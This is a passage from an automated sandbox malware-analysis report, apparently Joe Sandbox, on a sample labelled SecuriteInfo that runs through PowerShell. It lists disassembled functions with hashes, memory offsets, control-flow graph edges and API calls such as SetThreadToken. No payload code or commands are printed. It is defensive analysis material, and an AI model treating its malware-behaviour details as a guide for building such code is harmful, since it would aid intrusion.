                                                                                          • Source File: 00000000.00000002.4308640059.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2890000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: GlobalMemoryStatus
                                                                                          • String ID: 6P
                                                                                          • API String ID: 1890195054-465892130
                                                                                          • Opcode ID: 2cd258a854793d630ff56eb91c0c3de7fb0a03da73ede6d4bb78a274952625c1
                                                                                          • Instruction ID: 71d489fb990b7cc2c87f2b0c15c59ac16fc269f07278a53df2c98fff080f45c5
                                                                                          • Opcode Fuzzy Hash: 2cd258a854793d630ff56eb91c0c3de7fb0a03da73ede6d4bb78a274952625c1
                                                                                          • Instruction Fuzzy Hash: B61144B5C0065A9BCB10DF9AC544B9EFBF4FF48224F14816AE918B7340D7B8A914CFA5
                                                                                          Function 00DFD0EC Relevance: .1, Instructions: 72COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.4306801045.0000000000DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DFD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_dfd000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 05a7f3bf6ad7bf149bd16f5c9e9f75c2e8ce01630acdcea1a645c6da33519980
                                                                                          • Instruction ID: 4b1d96db1a2453d9e4520ad7cac1136ec50ae58f2da0c560ee471c4d9b08aad1
                                                                                          • Opcode Fuzzy Hash: 05a7f3bf6ad7bf149bd16f5c9e9f75c2e8ce01630acdcea1a645c6da33519980
                                                                                          • Instruction Fuzzy Hash: 2321F2B5504308EFDB04DF14D9C0B26BB67FB84314F24C56DDA494B292C776D846CAB1
                                                                                          Function 00DFD0E7 Relevance: .1, Instructions: 53COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.4306801045.0000000000DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DFD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_dfd000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                          • Instruction ID: 0cefc4169e0e269613f296244fb42723fcd9ab5a2fe1398d5977d2a4b98749f0
                                                                                          • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                          • Instruction Fuzzy Hash: 6C119D75504388DFDB05CF10D9C4B25BBB2FB84318F28C6A9D9494B656C33AD84ACFA2

                                                                                          Non-executed Functions

                                                                                          Function 0289AB98 Relevance: 2.7, Strings: 2, Instructions: 238COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.4308640059.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2890000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 6P$6P
                                                                                          • API String ID: 0-3411155718
                                                                                          • Opcode ID: 871183ad68541699cee0394f8b9e3d1b385978327182989e6a31cbc4b56baae5
                                                                                          • Instruction ID: 6c494ac6846a46dcf78c6c0e58f7107032ef0324c6e72435ff9ab69ff254d0c0
                                                                                          • Opcode Fuzzy Hash: 871183ad68541699cee0394f8b9e3d1b385978327182989e6a31cbc4b56baae5
                                                                                          • Instruction Fuzzy Hash: DF916F78E00209DFDF18CFA9C98579DBBF6AF88718F188529D409EB254EB749845CF81
                                                                                          Function 02892A68 Relevance: .3, Instructions: 260COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.4308640059.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2890000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3adbd26698c89bccaeddea6fdad9428c332ef9c6a13345332e0595c4d14708a6
                                                                                          • Instruction ID: 7d02145b6c5ed28fe3f52da119dc78d3d879d5b9bdbd3629018ff0a3feff2be2
                                                                                          • Opcode Fuzzy Hash: 3adbd26698c89bccaeddea6fdad9428c332ef9c6a13345332e0595c4d14708a6
                                                                                          • Instruction Fuzzy Hash: 17816D38B0025D9BDF0CEB79985477E7AA7BFC8710B18856ED806E7289DF3498418B91

                                                                                          Execution Graph

                                                                                          Execution Coverage:5.7%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:3
                                                                                          Total number of Limit Nodes:0
                                                                                          execution_graph 21761 8946828 21762 894686b SetThreadToken 21761->21762 21763 8946899 21762->21763

                                                                                          Executed Functions

                                                                                          Function 0496B490 Relevance: 2.8, Strings: 2, Instructions: 252COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 580 496b490-496b4a9 581 496b4ae-496b7f5 call 496acbc 580->581 582 496b4ab 580->582 582->581
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: {Y]n^$Y]n^
                                                                                          • API String ID: 0-1739517387
                                                                                          • Opcode ID: b0061b9973e421ed599d63628b0481ddfc0163930ac6a9ce696f609ad2475397
                                                                                          • Instruction ID: 46ac45f56a05ca9de835c7f0ff6c4bb4310dc7702bc5acc1fd9995dd4716e1ce
                                                                                          • Opcode Fuzzy Hash: b0061b9973e421ed599d63628b0481ddfc0163930ac6a9ce696f609ad2475397
                                                                                          • Instruction Fuzzy Hash: AE918E75F027559BEB19EFB488106AEBBE2EFC4610B40892DD106AB340DF74AE058BD5
                                                                                          Function 076C2308 Relevance: 15.4, Strings: 11, Instructions: 1603COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2375804722.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_76c0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: p5wk$piOk$piOk$piOk$piOk$piOk$|,Qk$#wk$$wk$}l$}l
                                                                                          • API String ID: 0-301268479
                                                                                          • Opcode ID: 1f0c5a7c33a7d223ef63a5ebf91aeb47f1794528edbfc996f6f44f8ed44f8e83
                                                                                          • Instruction ID: dc32b8054ce56cd0f50775c185b1af2e38fc42fb66fd29a851015de5ba8a23c8
                                                                                          • Opcode Fuzzy Hash: 1f0c5a7c33a7d223ef63a5ebf91aeb47f1794528edbfc996f6f44f8ed44f8e83
                                                                                          • Instruction Fuzzy Hash: F2C226B1B043469FDB21CA7988207BABBA1FFC6210F1484BED946CB751DB75C845C7A2
                                                                                          Function 076C17B8 Relevance: 2.8, Strings: 2, Instructions: 333COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 481 76c17b8-76c17da 482 76c1969-76c1988 481->482 483 76c17e0-76c17e5 481->483 491 76c195a-76c1966 482->491 492 76c198a-76c19b5 482->492 484 76c17fd-76c1801 483->484 485 76c17e7-76c17ed 483->485 489 76c1914-76c191e 484->489 490 76c1807-76c180b 484->490 487 76c17ef 485->487 488 76c17f1-76c17fb 485->488 487->484 488->484 493 76c192c-76c1932 489->493 494 76c1920-76c1929 489->494 495 76c180d-76c181e 490->495 496 76c184b 490->496 498 76c19bb-76c19c0 492->498 499 76c1b04-76c1b25 492->499 501 76c1938-76c1944 493->501 502 76c1934-76c1936 493->502 495->482 516 76c1824-76c1829 495->516 497 76c184d-76c184f 496->497 497->489 503 76c1855-76c1859 497->503 504 76c19d8-76c19dc 498->504 505 76c19c2-76c19c8 498->505 519 76c1b88-76c1b8d 499->519 520 76c1b27-76c1b34 499->520 506 76c1946-76c1957 501->506 502->506 503->489 509 76c185f-76c1863 503->509 514 76c1ab4-76c1abe 504->514 515 76c19e2-76c19e4 504->515 510 76c19cc-76c19d6 505->510 511 76c19ca 505->511 506->491 517 76c1865-76c186e 509->517 518 76c1886 509->518 510->504 511->504 526 76c1acc-76c1ad2 514->526 527 76c1ac0-76c1ac9 514->527 521 76c19f4 515->521 522 76c19e6-76c19f2 515->522 524 76c182b-76c1831 516->524 525 76c1841-76c1849 516->525 528 76c1875-76c1882 517->528 529 76c1870-76c1873 517->529 533 76c1889-76c1911 518->533 531 76c1b44 520->531 532 76c1b36-76c1b42 520->532 534 76c19f6-76c19f8 521->534 522->534 535 76c1835-76c183f 524->535 536 76c1833 524->536 525->497 537 76c1ad8-76c1ae4 526->537 538 76c1ad4-76c1ad6 526->538 540 76c1884 528->540 529->540 541 76c1b46-76c1b48 531->541 532->541 534->514 542 76c19fe-76c1a16 534->542 535->525 536->525 539 76c1ae6-76c1b01 537->539 538->539 540->533 546 76c1b7c-76c1b86 541->546 547 76c1b4a-76c1b50 541->547 555 76c1a18-76c1a1e 542->555 556 76c1a30-76c1a34 542->556 546->519 553 76c1b90-76c1b96 546->553 549 76c1b5e-76c1b79 547->549 550 76c1b52-76c1b54 547->550 550->549 557 76c1b9c-76c1ba8 553->557 558 76c1b98-76c1b9a 553->558 560 76c1a20 555->560 561 76c1a22-76c1a2e 555->561 565 76c1a3a-76c1a41 556->565 564 76c1baa-76c1bc1 557->564 558->564 560->556 561->556 568 76c1a48-76c1aa5 565->568 569 76c1a43-76c1a46 565->569 571 76c1aaa-76c1ab1 568->571 569->571
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2375804722.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_76c0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: }l$}l
                                                                                          • API String ID: 0-1599228476
                                                                                          • Opcode ID: d7eeb5ca5c629ba35049995367c383f1069dee83177ea3fa718df6eee0f2a05f
                                                                                          • Instruction ID: c096534cc6861192aba370dc7955856253a36b8389eb86d6f6524722f92df35f
                                                                                          • Opcode Fuzzy Hash: d7eeb5ca5c629ba35049995367c383f1069dee83177ea3fa718df6eee0f2a05f
                                                                                          • Instruction Fuzzy Hash: 28B1F6F1B042499FD718DAB9C4106BABBA6EFC6211F1880BED506CB352DA31DD52C7A1
                                                                                          Function 08946821 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 644 8946821-8946863 645 894686b-8946897 SetThreadToken 644->645 646 89468a0-89468bd 645->646 647 8946899-894689f 645->647 647->646
                                                                                          APIs
                                                                                          • SetThreadToken.KERNELBASE(F0F4083E), ref: 0894688A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2379081365.0000000008940000.00000040.00000800.00020000.00000000.sdmp, Offset: 08940000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_8940000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID: ThreadToken
                                                                                          • String ID:
                                                                                          • API String ID: 3254676861-0
                                                                                          • Opcode ID: c5de8a060c3409dcb1eb6ddc5aac68c7e04c49990286ddd0f695de0272263aaf
                                                                                          • Instruction ID: 889c6ae0864790d035a78ea6d5b1b0d53a1ad8c1ee64ab820f67d62665c35a56
                                                                                          • Opcode Fuzzy Hash: c5de8a060c3409dcb1eb6ddc5aac68c7e04c49990286ddd0f695de0272263aaf
                                                                                          • Instruction Fuzzy Hash: BD1125B5900209CFDB10DF9AC984B9EFBF4AF88324F24841AD519A7350D774A944CFA0
                                                                                          Function 08946828 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 650 8946828-8946897 SetThreadToken 652 89468a0-89468bd 650->652 653 8946899-894689f 650->653 653->652
                                                                                          APIs
                                                                                          • SetThreadToken.KERNELBASE(F0F4083E), ref: 0894688A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2379081365.0000000008940000.00000040.00000800.00020000.00000000.sdmp, Offset: 08940000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_8940000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID: ThreadToken
                                                                                          • String ID:
                                                                                          • API String ID: 3254676861-0
                                                                                          • Opcode ID: e070ace6d6aad0cc6569ad730199986191c1e248ac9c17bb7814a94db076be8d
                                                                                          • Instruction ID: c58e50ee906f7d9cde8b04699b0269163cf8da5c348d5bf5bad79b1299566fd1
                                                                                          • Opcode Fuzzy Hash: e070ace6d6aad0cc6569ad730199986191c1e248ac9c17bb7814a94db076be8d
                                                                                          • Instruction Fuzzy Hash: 451122B59003098FDB10DF9AC884B9EFBF8AB88324F24841AD518A3350D7B4A944CFA4
                                                                                          Function 076C3CE8 Relevance: .3, Instructions: 330COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 758 76c3ce8-76c3d0d 759 76c3f00-76c3f1c 758->759 760 76c3d13-76c3d18 758->760 768 76c3f1e-76c3f4a 759->768 769 76c3ee1 759->769 761 76c3d1a-76c3d20 760->761 762 76c3d30-76c3d34 760->762 764 76c3d24-76c3d2e 761->764 765 76c3d22 761->765 766 76c3d3a-76c3d3c 762->766 767 76c3eb0-76c3eba 762->767 764->762 765->762 772 76c3d4c 766->772 773 76c3d3e-76c3d4a 766->773 770 76c3ebc-76c3ec5 767->770 771 76c3ec8-76c3ece 767->771 774 76c40ce-76c40e5 768->774 775 76c3f50-76c3f55 768->775 780 76c3ee2-76c3efd 769->780 776 76c3ed4-76c3ee0 771->776 777 76c3ed0-76c3ed2 771->777 779 76c3d4e-76c3d50 772->779 773->779 781 76c3f6d-76c3f71 775->781 782 76c3f57-76c3f5d 775->782 776->769 777->780 779->767 783 76c3d56-76c3d75 779->783 789 76c3f77-76c3f79 781->789 790 76c4080-76c408a 781->790 785 76c3f5f 782->785 786 76c3f61-76c3f6b 782->786 805 76c3d85 783->805 806 76c3d77-76c3d83 783->806 785->781 786->781 792 76c3f89 789->792 793 76c3f7b-76c3f87 789->793 794 76c408c-76c4094 790->794 795 76c4097-76c409d 790->795 796 76c3f8b-76c3f8d 792->796 793->796 797 76c409f-76c40a1 795->797 798 76c40a3-76c40af 795->798 796->790 801 76c3f93-76c3fb2 796->801 802 76c40b1-76c40cb 797->802 798->802 814 76c3fb4-76c3fc0 801->814 815 76c3fc2 801->815 808 76c3d87-76c3d89 805->808 806->808 808->767 810 76c3d8f-76c3d96 808->810 810->759 812 76c3d9c-76c3da1 810->812 816 76c3db9-76c3dc8 812->816 817 76c3da3-76c3da9 812->817 818 76c3fc4-76c3fc6 814->818 815->818 816->767 823 76c3dce-76c3dec 816->823 819 76c3dad-76c3db7 817->819 820 76c3dab 817->820 818->790 822 76c3fcc-76c4003 818->822 819->816 820->816 831 76c401d-76c4024 822->831 832 76c4005-76c400b 822->832 823->767 830 76c3df2-76c3e17 823->830 830->767 844 76c3e1d-76c3e24 830->844 835 76c403c-76c407d 831->835 836 76c4026-76c402c 831->836 833 76c400d 832->833 834 76c400f-76c401b 832->834 833->831 834->831 838 76c402e 836->838 839 76c4030-76c403a 836->839 838->835 839->835 845 76c3e6a-76c3e9d 844->845 846 76c3e26-76c3e41 844->846 856 76c3ea4-76c3ead 845->856 849 76c3e5b-76c3e5f 846->849 850 76c3e43-76c3e49 846->850 854 76c3e66-76c3e68 849->854 851 76c3e4d-76c3e59 850->851 852 76c3e4b 850->852 851->849 852->849 854->856
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2375804722.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_76c0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 77d97f4405d2539f7b9ffae54e0507cf2a5f0aa2e8407c1b158b8b37e8171fe6
                                                                                          • Instruction ID: e85f94d9ae17093c91a4d84969defc68e47100018162c84664e29cc3fdc0e83f
                                                                                          • Opcode Fuzzy Hash: 77d97f4405d2539f7b9ffae54e0507cf2a5f0aa2e8407c1b158b8b37e8171fe6
                                                                                          • Instruction Fuzzy Hash: 9BB104B1B00242CFDB25CA7985117BABBA2DFC5610F14C4AED506CB745EB31DD46CBA2
                                                                                          Function 049629F0 Relevance: .2, Instructions: 209COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 861 49629f0-4962a1e 862 4962a24-4962a3a 861->862 863 4962af5-4962b37 861->863 864 4962a3f-4962a52 862->864 865 4962a3c 862->865 868 4962c51-4962c61 863->868 869 4962b3d-4962b56 863->869 864->863 870 4962a58-4962a65 864->870 865->864 871 4962b5b-4962b69 869->871 872 4962b58 869->872 874 4962a67 870->874 875 4962a6a-4962a7c 870->875 871->868 878 4962b6f-4962b79 871->878 872->871 874->875 875->863 879 4962a7e-4962a88 875->879 880 4962b87-4962b94 878->880 881 4962b7b-4962b7d 878->881 883 4962a96-4962aa6 879->883 884 4962a8a-4962a8c 879->884 880->868 882 4962b9a-4962baa 880->882 881->880 885 4962baf-4962bbd 882->885 886 4962bac 882->886 883->863 887 4962aa8-4962ab2 883->887 884->883 885->868 891 4962bc3-4962bd3 885->891 886->885 888 4962ab4-4962ab6 887->888 889 4962ac0-4962af4 887->889 888->889 893 4962bd5 891->893 894 4962bd8-4962be5 891->894 893->894 894->868 897 4962be7-4962bf7 894->897 898 4962bfc-4962c08 897->898 899 4962bf9 897->899 898->868 901 4962c0a-4962c24 898->901 899->898 902 4962c26 901->902 903 4962c29 901->903 902->903 904 4962c2e-4962c38 903->904 905 4962c3d-4962c50 904->905
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 80f42cb2112fb7e1b4440347ee72341af0ee61ee2c250bdee0b61e83e33c2983
                                                                                          • Instruction ID: b2a5aba3e97b981a61ab111be7f953c12cc13174b7a227d25c6ad58afcce058d
                                                                                          • Opcode Fuzzy Hash: 80f42cb2112fb7e1b4440347ee72341af0ee61ee2c250bdee0b61e83e33c2983
                                                                                          • Instruction Fuzzy Hash: B9917A74A00205DFCB15CF59C494AAEFBB5FF48310B2486A9D916AB3A5C735FC52CBA0
                                                                                          Function 0496BAC0 Relevance: .2, Instructions: 155COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1042 496bac0-496bb50 1046 496bb56-496bb61 1042->1046 1047 496bb52 1042->1047 1048 496bb66-496bbc0 call 496af98 1046->1048 1049 496bb63 1046->1049 1047->1046 1056 496bbc2-496bbc7 1048->1056 1057 496bc11-496bc15 1048->1057 1049->1048 1056->1057 1058 496bbc9-496bbec 1056->1058 1059 496bc26 1057->1059 1060 496bc17-496bc21 1057->1060 1062 496bbf2-496bbfd 1058->1062 1061 496bc2b-496bc2d 1059->1061 1060->1059 1063 496bc52 1061->1063 1064 496bc2f-496bc50 1061->1064 1067 496bc06-496bc0f 1062->1067 1068 496bbff-496bc05 1062->1068 1065 496bc5a-496bc5e 1063->1065 1066 496bc55 call 496a978 1063->1066 1064->1065 1070 496bc97-496bcc6 1065->1070 1071 496bc60-496bc89 1065->1071 1066->1065 1067->1061 1068->1067 1071->1070
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d9e8f07586464ae172d5006543c88269eab184531e32675b74d346eb08e85e9b
                                                                                          • Instruction ID: 998e9d159eacd9f36c8be62bfa33c4db4b16238ac02a5cae40254a082ae5bbf5
                                                                                          • Opcode Fuzzy Hash: d9e8f07586464ae172d5006543c88269eab184531e32675b74d346eb08e85e9b
                                                                                          • Instruction Fuzzy Hash: 6F612575E01218CFDB14DFA9D584B8DBBF5EF88310F14812AE819AB254EB74AD41CBA0
                                                                                          Function 04967740 Relevance: .2, Instructions: 154COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1081 4967740-4967776 1084 496777f-4967788 1081->1084 1085 4967778-496777a 1081->1085 1088 4967791-49677af 1084->1088 1089 496778a-496778c 1084->1089 1086 4967829-496782e 1085->1086 1092 49677b5-49677b9 1088->1092 1093 49677b1-49677b3 1088->1093 1089->1086 1094 49677bb-49677c0 1092->1094 1095 49677c8-49677cf 1092->1095 1093->1086 1094->1095 1096 49677d1-49677fa 1095->1096 1097 496782f-4967860 1095->1097 1100 49677fc-4967806 1096->1100 1101 4967808 1096->1101 1109 4967866-49678bd 1097->1109 1110 49678e2-49678e6 1097->1110 1103 496780a-4967816 1100->1103 1101->1103 1107 496781c-4967823 1103->1107 1108 4967818-496781a 1103->1108 1107->1086 1108->1086 1117 49678bf 1109->1117 1118 49678c9-49678d7 1109->1118 1121 49678e9 call 4967932 1110->1121 1122 49678e9 call 4967940 1110->1122 1112 49678ec-49678f1 1117->1118 1118->1110 1120 49678d9-49678e1 1118->1120 1121->1112 1122->1112
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4046a0081180256b2c56f47b4b120aa5a22f092d5b14b739ca4528fa706dbd82
                                                                                          • Instruction ID: 69270280b32628391afb9b48e11af39a35d17a3f18bb2953bc6a8dc81bab9038
                                                                                          • Opcode Fuzzy Hash: 4046a0081180256b2c56f47b4b120aa5a22f092d5b14b739ca4528fa706dbd82
                                                                                          • Instruction Fuzzy Hash: D1519F357042059FD704DBA9D884A6E77EAFFC9319B1585B9E50ACB351EB31EC01CBA0
                                                                                          Function 0496BAB0 Relevance: .1, Instructions: 149COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1177 496bab0-496bb50 1181 496bb56-496bb61 1177->1181 1182 496bb52 1177->1182 1183 496bb66-496bbc0 call 496af98 1181->1183 1184 496bb63 1181->1184 1182->1181 1191 496bbc2-496bbc7 1183->1191 1192 496bc11-496bc15 1183->1192 1184->1183 1191->1192 1193 496bbc9-496bbec 1191->1193 1194 496bc26 1192->1194 1195 496bc17-496bc21 1192->1195 1197 496bbf2-496bbfd 1193->1197 1196 496bc2b-496bc2d 1194->1196 1195->1194 1198 496bc52 1196->1198 1199 496bc2f-496bc50 1196->1199 1202 496bc06-496bc0f 1197->1202 1203 496bbff-496bc05 1197->1203 1200 496bc5a-496bc5e 1198->1200 1201 496bc55 call 496a978 1198->1201 1199->1200 1205 496bc97-496bcc6 1200->1205 1206 496bc60-496bc89 1200->1206 1201->1200 1202->1196 1203->1202 1206->1205
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: df18e1780133101422fee73a3c2d76672d559927576b6325166ca9ea26de2b88
                                                                                          • Instruction ID: cdd415f4a189b75121340e133997e0fbdcd748d82d0ea6059f994a18108705c7
                                                                                          • Opcode Fuzzy Hash: df18e1780133101422fee73a3c2d76672d559927576b6325166ca9ea26de2b88
                                                                                          • Instruction Fuzzy Hash: 54513875E01248CFCB14DFA9D584A8DBFF5EF88310F148069E819EB365EB74A941CB90
                                                                                          Function 076C3CDE Relevance: .1, Instructions: 136COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1216 76c3cde-76c3ce0 1217 76c3c62-76c3c84 1216->1217 1218 76c3ce2-76c3d0d 1216->1218 1225 76c3c8f-76c3c95 1217->1225 1226 76c3c86-76c3c8c 1217->1226 1220 76c3f00-76c3f1c 1218->1220 1221 76c3d13-76c3d18 1218->1221 1235 76c3f1e-76c3f4a 1220->1235 1236 76c3ee1 1220->1236 1223 76c3d1a-76c3d20 1221->1223 1224 76c3d30-76c3d34 1221->1224 1230 76c3d24-76c3d2e 1223->1230 1231 76c3d22 1223->1231 1232 76c3d3a-76c3d3c 1224->1232 1233 76c3eb0-76c3eba 1224->1233 1227 76c3c9b-76c3ca7 1225->1227 1228 76c3c97-76c3c99 1225->1228 1234 76c3ca9-76c3cc2 1227->1234 1228->1234 1230->1224 1231->1224 1239 76c3d4c 1232->1239 1240 76c3d3e-76c3d4a 1232->1240 1237 76c3ebc-76c3ec5 1233->1237 1238 76c3ec8-76c3ece 1233->1238 1242 76c40ce-76c40e5 1235->1242 1243 76c3f50-76c3f55 1235->1243 1248 76c3ee2-76c3efd 1236->1248 1244 76c3ed4-76c3ee0 1238->1244 1245 76c3ed0-76c3ed2 1238->1245 1247 76c3d4e-76c3d50 1239->1247 1240->1247 1250 76c3f6d-76c3f71 1243->1250 1251 76c3f57-76c3f5d 1243->1251 1244->1236 1245->1248 1247->1233 1252 76c3d56-76c3d75 1247->1252 1258 76c3f77-76c3f79 1250->1258 1259 76c4080-76c408a 1250->1259 1254 76c3f5f 1251->1254 1255 76c3f61-76c3f6b 1251->1255 1275 76c3d85 1252->1275 1276 76c3d77-76c3d83 1252->1276 1254->1250 1255->1250 1262 76c3f89 1258->1262 1263 76c3f7b-76c3f87 1258->1263 1264 76c408c-76c4094 1259->1264 1265 76c4097-76c409d 1259->1265 1266 76c3f8b-76c3f8d 1262->1266 1263->1266 1267 76c409f-76c40a1 1265->1267 1268 76c40a3-76c40af 1265->1268 1266->1259 1271 76c3f93-76c3fb2 1266->1271 1272 76c40b1-76c40cb 1267->1272 1268->1272 1284 76c3fb4-76c3fc0 1271->1284 1285 76c3fc2 1271->1285 1278 76c3d87-76c3d89 1275->1278 1276->1278 1278->1233 1280 76c3d8f-76c3d96 1278->1280 1280->1220 1282 76c3d9c-76c3da1 1280->1282 1286 76c3db9-76c3dc8 1282->1286 1287 76c3da3-76c3da9 1282->1287 1288 76c3fc4-76c3fc6 1284->1288 1285->1288 1286->1233 1293 76c3dce-76c3dec 1286->1293 1289 76c3dad-76c3db7 1287->1289 1290 76c3dab 1287->1290 1288->1259 1292 76c3fcc-76c4003 1288->1292 1289->1286 1290->1286 1301 76c401d-76c4024 1292->1301 1302 76c4005-76c400b 1292->1302 1293->1233 1300 76c3df2-76c3e17 1293->1300 1300->1233 1314 76c3e1d-76c3e24 1300->1314 1305 76c403c-76c407d 1301->1305 1306 76c4026-76c402c 1301->1306 1303 76c400d 1302->1303 1304 76c400f-76c401b 1302->1304 1303->1301 1304->1301 1308 76c402e 1306->1308 1309 76c4030-76c403a 1306->1309 1308->1305 1309->1305 1315 76c3e6a-76c3e9d 1314->1315 1316 76c3e26-76c3e41 1314->1316 1326 76c3ea4-76c3ead 1315->1326 1319 76c3e5b-76c3e5f 1316->1319 1320 76c3e43-76c3e49 1316->1320 1324 76c3e66-76c3e68 1319->1324 1321 76c3e4d-76c3e59 1320->1321 1322 76c3e4b 1320->1322 1321->1319 1322->1319 1324->1326
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2375804722.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
